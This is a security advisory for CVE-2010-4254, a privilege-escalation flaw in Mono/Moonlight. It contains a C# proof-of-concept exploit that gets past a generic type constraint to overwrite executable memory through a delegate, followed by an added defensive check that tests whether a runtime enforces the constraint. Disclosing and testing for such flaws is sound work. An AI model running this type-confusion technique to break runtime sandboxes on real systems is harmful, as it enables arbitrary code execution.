Mono/Moonlight Generic Type Argument Local Privilege Escalation - [CVE: 2010-4254]

2011-01-11 09:15:22


Mono and Moonlight are prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.


using System;
using System.Reflection;
using System.Runtime.InteropServices;

// Layout stand-in whose first field is read in place of the delegate's internals.
public class DelegateWrapper {
    public IntPtr method_ptr;
}

public delegate void MethodWrapper ();

public class BreakSandbox {
    // T is constrained to DelegateWrapper, so this conversion is only
    // type-safe when the constraint is actually enforced.
    private static DelegateWrapper Convert <T> (T dingus) where T : DelegateWrapper {
        return dingus;
    }

    private static DelegateWrapper ConvertDelegate (Delegate del) {
        var m = typeof (BreakSandbox).GetMethod ("Convert",
            BindingFlags.NonPublic | BindingFlags.Static);
        // Instantiates Convert<T> with Delegate, which does not satisfy
        // the "where T : DelegateWrapper" constraint.
        var gm = m.MakeGenericMethod (typeof (Delegate));

        var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
            (typeof (Func <Delegate, DelegateWrapper>), null, gm);

        return d (del);
    }

    public static void Main (string [] args) {
        MethodWrapper d = delegate {
            Console.WriteLine ("Hello");
        };

        d ();
        var converted = ConvertDelegate (d);
        // Overwrite the already WX page with a 'ret'
        Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
        d ();
    }
}
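
The proof of concept above depends on MakeGenericMethod accepting a type argument that violates the method's generic constraint. The following check is an added example, not part of the original advisory or of the Mono project. It tests whether the runtime it runs on enforces that constraint, relying on the documented .NET contract that MakeGenericMethod throws ArgumentException for a type argument that does not satisfy a constraint. The names Wrapper, Derived and ConstraintCheck are hypothetical.

```csharp
using System;
using System.Reflection;

public class Wrapper { }            // hypothetical constraint type
public class Derived : Wrapper { }  // hypothetical type that satisfies the constraint

public static class ConstraintCheck {
    // Same shape as the constrained method in the advisory's code.
    private static Wrapper Convert<T> (T value) where T : Wrapper {
        return value;
    }

    // True if the runtime refuses to instantiate Convert<T> with 'arg'.
    private static bool Rejects (Type arg) {
        MethodInfo m = typeof (ConstraintCheck).GetMethod ("Convert",
            BindingFlags.NonPublic | BindingFlags.Static);
        try {
            m.MakeGenericMethod (arg);
            return false;
        } catch (ArgumentException) {
            return true;
        }
    }

    // Exit codes: 0 = constraint enforced, 1 = not enforced, 2 = check itself failed.
    public static int Main () {
        // Control case: a type that satisfies the constraint must be accepted,
        // otherwise a rejection below would prove nothing.
        if (Rejects (typeof (Derived))) {
            Console.WriteLine ("INCONCLUSIVE: valid type argument was rejected");
            return 2;
        }
        // Delegate does not derive from Wrapper, so it must be rejected.
        if (Rejects (typeof (Delegate))) {
            Console.WriteLine ("OK: generic constraint enforced by MakeGenericMethod");
            return 0;
        }
        Console.WriteLine ("WARNING: generic constraint not enforced; " +
            "treat this runtime as affected and update it");
        return 1;
    }
}
```

The check stops at the instantiation step and performs no conversion or memory write, so it can be run as part of a runtime inventory or build pipeline.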

